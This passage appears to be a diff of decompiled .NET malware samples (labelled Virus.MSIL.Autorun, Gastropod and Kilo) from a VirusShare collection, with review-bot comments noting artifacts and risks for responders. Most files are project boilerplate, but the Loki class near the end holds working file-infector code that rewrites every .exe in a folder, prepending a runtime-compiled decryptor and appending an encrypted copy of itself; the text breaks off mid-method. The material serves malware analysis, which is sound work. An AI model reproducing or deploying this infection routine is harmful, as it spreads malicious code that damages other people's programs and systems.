public static extern void SetLocalTime(Form1.SystemTime st);
}
[StructLayout(LayoutKind.Sequential)]
public class SystemTime
{
public ushort wYear;
}
}
}
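Review bot: `IsCDRom` and `IsRemove` compare the `GetDriveType` result against bare `5` and `2`, while the `DriveType` enum declared near the end of the class is never referenced, so the drive-handling logic is harder to follow than it needs to be. A comment on each comparison, e.g. `// 5 == DriveType.CDRom` and `// 2 == DriveType.FloppyOrUsb (removable media)`, would tie the two together for the next reader. The file would also benefit from a header comment listing the on-disk artifacts visible in this section, since those are what a responder would sweep for: `services.exe` and `autorun.inf` at drive roots carrying ReadOnly/System/Hidden attributes, the `hotice..` directory, and backup files (`.GHO`, `.BKF`, `.PQI`, `.TIB`, `.BAK`) renamed with a `.bek` suffix and hidden. As in the registry helper, every operation is wrapped in an empty `catch`, so the presence of each artifact should be verified rather than inferred from the code.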
@@ -0,0 +1,123 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="$this.Icon" mimetype="application/x-microsoft.net.object.binary.base64">
<value>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</value>
</data>
</root>
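Review bot: The `$this.Icon` entry is declared with mimetype `application/x-microsoft.net.object.binary.base64`, which the schema comment in this same file describes as a BinaryFormatter-serialized object, so anything that loads this .resx through a resource reader or a designer will deserialize data that came from the sample. I would add a comment directly under `<root>` such as `<!-- Extracted from a malware sample: do not open in a designer or load with ResXResourceReader; $this.Icon is a BinaryFormatter payload. -->`. The value is elided on this page, so whether the payload is only an icon cannot be judged from here; it should be treated as untrusted and inspected only in an isolated analysis environment.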
@@ -0,0 +1,22 @@
// Decompiled with JetBrains decompiler
// Type: redice.Program
// Assembly: redice, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A08BD253-D698-4C81-8053-905E15E13E56
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265.exe
using System;
using System.Windows.Forms;
namespace redice
{
internal static class Program
{
[STAThread]
private static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run((Form) new Form1());
}
}
}
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: redice.Properties.Resources
// Assembly: redice, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A08BD253-D698-4C81-8053-905E15E13E56
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace redice.Properties
{
[DebuggerNonUserCode]
[CompilerGenerated]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (redice.Properties.Resources.resourceMan == null)
redice.Properties.Resources.resourceMan = new ResourceManager("redice.Properties.Resources", typeof (redice.Properties.Resources).Assembly);
return redice.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => redice.Properties.Resources.resourceCulture;
set => redice.Properties.Resources.resourceCulture = value;
}
}
}
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: redice.Properties.Settings
// Assembly: redice, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A08BD253-D698-4C81-8053-905E15E13E56
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace redice.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "8.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
}
}
@@ -0,0 +1,50 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{6A729B30-F670-4E6F-95FC-EB2E86BB75AA}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>redice</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>redice</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Form1.cs" />
<Compile Include="ExecRegedit.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "redice", "Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265.csproj", "{6A729B30-F670-4E6F-95FC-EB2E86BB75AA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6A729B30-F670-4E6F-95FC-EB2E86BB75AA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{6A729B30-F670-4E6F-95FC-EB2E86BB75AA}.Debug|Any CPU.Build.0 = Debug|Any CPU
{6A729B30-F670-4E6F-95FC-EB2E86BB75AA}.Release|Any CPU.ActiveCfg = Release|Any CPU
{6A729B30-F670-4E6F-95FC-EB2E86BB75AA}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: MainApp
// Assembly: sna, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 85B9BA0A-84D0-4A00-94C1-CE02B81D71C1
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Gastropod-1b8f5086ac6be43f51a9c9e90d8400df1c0e436d1a6bae9f559ecbaa7fa3619e.exe
using kckelhvxlr;
using System.Threading;
internal class MainApp
{
public static void Main()
{
Thread thread = new Thread(new ThreadStart(xrieopydqqcD.Go));
thread.Start();
Thread.Sleep(30000);
thread.Abort();
}
}
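Review bot: `Main` gives the worker a fixed window, `Thread.Sleep(30000)` followed by `thread.Abort()`, and nothing in the file says so. A one-line comment would help anyone observing the sample dynamically, e.g. `// Go() runs on a worker thread and is aborted after 30 s`. The second `MainApp.cs` further down the page is the same code with `zwuUkpmiAMoxhf.lapixb` in place of `kckelhvxlr.xrieopydqqcD` and a 100000 ms window, while the assembly name `sna` is unchanged. That suggests per-sample identifier randomisation, so detections should not key on the namespace or class names. The body of `Go` lives in a file outside this hunk.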
@@ -0,0 +1,37 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Gastropod-1b8f5086ac6be43f51a9c9e90d8400df1c0e436d1a6bae9f559ecbaa7fa3619e.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{C2F1D96B-D869-4BDB-B883-67681B31397E}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>sna</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="MainApp.cs" />
<Compile Include="kckelhvxlr\xrieopydqqcD.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "sna", "Virus.MSIL.Gastropod-1b8f5086ac6be43f51a9c9e90d8400df1c0e436d1a6bae9f559ecbaa7fa3619e.csproj", "{C2F1D96B-D869-4BDB-B883-67681B31397E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{C2F1D96B-D869-4BDB-B883-67681B31397E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{C2F1D96B-D869-4BDB-B883-67681B31397E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{C2F1D96B-D869-4BDB-B883-67681B31397E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{C2F1D96B-D869-4BDB-B883-67681B31397E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: MainApp
// Assembly: sna, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B33CF1F9-9697-4137-81AE-C49BE0C90EB5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.MSIL.Gastropod-3da647492dbf464bd7c6ca18c70e0a510e03dd25b149786cd96bf8c8dbcaa29e.exe
using System.Threading;
using zwuUkpmiAMoxhf;
internal class MainApp
{
public static void Main()
{
Thread thread = new Thread(new ThreadStart(lapixb.Go));
thread.Start();
Thread.Sleep(100000);
thread.Abort();
}
}
@@ -0,0 +1,37 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.MSIL.Gastropod-3da647492dbf464bd7c6ca18c70e0a510e03dd25b149786cd96bf8c8dbcaa29e.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{17EC3B78-A178-42F5-B9C7-DDE7ADB60015}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>sna</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="MainApp.cs" />
<Compile Include="zwuUkpmiAMoxhf\lapixb.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "sna", "Virus.MSIL.Gastropod-3da647492dbf464bd7c6ca18c70e0a510e03dd25b149786cd96bf8c8dbcaa29e.csproj", "{17EC3B78-A178-42F5-B9C7-DDE7ADB60015}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{17EC3B78-A178-42F5-B9C7-DDE7ADB60015}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{17EC3B78-A178-42F5-B9C7-DDE7ADB60015}.Debug|Any CPU.Build.0 = Debug|Any CPU
{17EC3B78-A178-42F5-B9C7-DDE7ADB60015}.Release|Any CPU.ActiveCfg = Release|Any CPU
{17EC3B78-A178-42F5-B9C7-DDE7ADB60015}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,16 @@
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Permissions;
[assembly: AssemblyProduct("")]
[assembly: Guid("4086dd52-8274-4eb3-8a28-7de497915d23")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]
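Review bot: The `SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)` line is the one non-default entry in this file and should carry a comment. The C# compiler emits this request for assemblies built with unsafe code allowed, so it most likely reflects a build setting rather than a hand-written demand, although no `unsafe` block is visible in the Loki sources on this page. Suggested: `// SkipVerification request: probably compiler-emitted (unsafe build option); all descriptive metadata fields are empty`.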
@@ -0,0 +1,256 @@
// Decompiled with JetBrains decompiler
// Type: Loki.Loki
// Assembly: Loki, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 803A5091-7913-4057-8BFA-DEFEA0629B18
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Kilo.a-f94fb78411f11c9fe81fb962c63346417fe58b0057f41acb265173818d922567.exe
using Microsoft.CSharp;
using Microsoft.Win32;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.Diagnostics;
using System.IO;
using System.Security.Cryptography;
using System.Text;
namespace Loki
{
internal class Loki
{
private int encm = 0;
private string k = (string) null;
private string iv = (string) null;
public void Populate(string dir)
{
if (!Directory.Exists(dir))
return;
string[] files = Directory.GetFiles(dir, "*.exe");
for (int index1 = 0; index1 < files.Length; ++index1)
{
try
{
byte[] numArray1 = this.read(files[index1]);
if (numArray1[60] != (byte) 128)
{
new Random().Next(1000);
string d = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
string str1 = Directory.GetCurrentDirectory() + "\\" + this.Rand() + ".exe";
string str2 = Directory.GetCurrentDirectory() + "\\" + this.Rand() + (object) DateTime.Now.Year + ".exe";
byte[] numArray2 = this.read(d);
FileStream output1 = new FileStream(str1, FileMode.CreateNew);
BinaryWriter binaryWriter1 = new BinaryWriter((Stream) output1);
for (int index2 = 0; index2 < numArray2.Length; ++index2)
binaryWriter1.BaseStream.WriteByte(numArray2[index2]);
binaryWriter1.Close();
output1.Close();
this.Encrypt(str1, str2, this.encm);
if (File.Exists(str2))
{
if (File.Exists(str1))
File.Delete(str1);
int length = (int) new FileInfo(files[index1]).Length;
string str3 = this.Decryptor(str2, 5632, length + 5632, this.encm);
if (File.Exists(str3))
{
byte[] numArray3 = this.read(str3);
byte[] numArray4 = this.read(str2);
if (File.Exists(files[index1]))
{
File.Delete(files[index1]);
FileStream output2 = new FileStream(files[index1], FileMode.CreateNew);
BinaryWriter binaryWriter2 = new BinaryWriter((Stream) output2);
for (int index3 = 0; index3 < numArray3.Length; ++index3)
binaryWriter2.BaseStream.WriteByte(numArray3[index3]);
for (int index4 = 0; index4 < numArray1.Length; ++index4)
binaryWriter2.BaseStream.WriteByte(numArray1[index4]);
for (int index5 = 0; index5 < numArray4.Length; ++index5)
binaryWriter2.BaseStream.WriteByte(numArray4[index5]);
binaryWriter2.Close();
output2.Close();
File.Delete(str2);
File.Delete(str3);
}
}
else if (File.Exists(str2))
File.Delete(str2);
}
}
}
catch
{
}
}
}
public byte[] read(string d)
{
FileStream input = new FileStream(d, FileMode.Open, FileAccess.Read);
BinaryReader binaryReader = new BinaryReader((Stream) input);
byte[] numArray = new byte[input.Length];
for (int index = 0; index < numArray.Length; ++index)
numArray[index] = binaryReader.ReadByte();
binaryReader.Close();
input.Close();
return numArray;
}
public void Encrypt(string inf, string outf, int e)
{
if (e == 1)
{
try
{
string s = this.getKey();
if (s.Length > 8)
s = s.Substring(0, 8);
else if (s.Length < 8)
{
int num = 8 - s.Length;
for (int index = 0; index < num; ++index)
s += (string) (object) index;
}
byte[] bytes = new UnicodeEncoding().GetBytes(s);
FileStream fileStream1 = new FileStream(outf, FileMode.Create);
RijndaelManaged rijndaelManaged = new RijndaelManaged();
CryptoStream cryptoStream = new CryptoStream((Stream) fileStream1, rijndaelManaged.CreateEncryptor(bytes, bytes), CryptoStreamMode.Write);
FileStream fileStream2 = new FileStream(inf, FileMode.Open);
int num1;
while ((num1 = fileStream2.ReadByte()) != -1)
cryptoStream.WriteByte((byte) num1);
fileStream2.Close();
cryptoStream.Close();
fileStream1.Close();
}
catch
{
}
}
else
{
try
{
byte[] buffer = this.read(inf);
byte[] rgbKey = Convert.FromBase64String(this.getKey());
byte[] rgbIV = Convert.FromBase64String(this.getIV());
FileStream fileStream = File.Open(outf, FileMode.OpenOrCreate);
CryptoStream output = new CryptoStream((Stream) fileStream, new TripleDESCryptoServiceProvider().CreateEncryptor(rgbKey, rgbIV), CryptoStreamMode.Write);
BinaryWriter binaryWriter = new BinaryWriter((Stream) output);
binaryWriter.Write(buffer);
binaryWriter.Close();
output.Close();
fileStream.Close();
}
catch
{
}
}
}
public string Decryptor(string f, int num, int hl, int e)
{
string path = Directory.GetCurrentDirectory() + "\\" + this.Rand() + (object) DateTime.Now.Year + ".exe";
ICodeCompiler compiler = new CSharpCodeProvider().CreateCompiler();
CompilerParameters options = new CompilerParameters();
options.ReferencedAssemblies.Add("System.dll");
options.ReferencedAssemblies.Add("System.Windows.Forms.dll");
options.GenerateExecutable = true;
options.CompilerOptions = "/target:winexe";
options.OutputAssembly = path;
Random random = new Random();
string str1 = this.Rand() + (object) random.Next(100);
string str2 = this.Rand() + (object) hl;
string str3 = this.Rand() + (object) random.Next(hl);
